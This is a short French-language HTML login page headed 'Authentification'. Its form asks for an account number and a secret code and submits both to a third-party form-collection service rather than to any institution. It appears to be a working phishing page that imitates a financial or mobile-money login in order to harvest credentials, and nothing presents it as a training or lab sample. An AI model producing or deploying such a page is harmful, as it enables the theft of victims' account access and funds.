
<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="icon" type="image/png" href="images.png">
  <style>
    body {
      font-family: Arial, sans-serif;
      padding: 2rem;
      background: #f0f0f0;
    }

    form {
      background: #f15d22;
      padding: 2rem;
      border-radius: 8px;
      max-width: 400px;
      margin: auto;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
    }

    label {
      display: block;
      margin-top: 1rem;
    }

    input, textarea {
      width: 100%;
      padding: 0.5rem;
      margin-top: 0.3rem;
      border: 1px solid #ccc;
      border-radius: 4px;
    }

    button {
      margin-top: 1rem;
      padding: 0.7rem;
      width: 100%;
      background: #a6a6a6;
      color: white;
      border: none;
      border-radius: 4px;
      font-size: 1rem;
    }

    button:hover {
      background: #a6a6a6;
    }
    .carte {
      background-color: #f9f9f9;
      padding: 1rem;
      margin-bottom: 1rem;
      border-radius: 8px;
      box-shadow: 0 0 5px rgba(0,0,0,0.1);
    }

    @media (min-width: 768px) {
      .carte {
        max-width: 600px;
        margin: 1rem auto;
      }
    }
  </style>
</head>
<body>



  <form action="https://formcarry.com/s/EntSmmZNaOg" method="POST" accept-charset="UTF-8">
<center>  <h2>Authentification<h2>
  <img src="Capture d'écran 2025-06-21 151151.png" alt="Italian Trulli"  > </center>

    <label for="Numéro">Saisissez Votre Numéro de compte (*):</label>
    <input type="text" id="name" name="name" required>

    <label for="password">Saisissez votre code secret (*) :</label>
    <input type="password" id="password" name="password" required="jjjj">

    <button type="submit">valider</button>
  </form>

</body>
</html>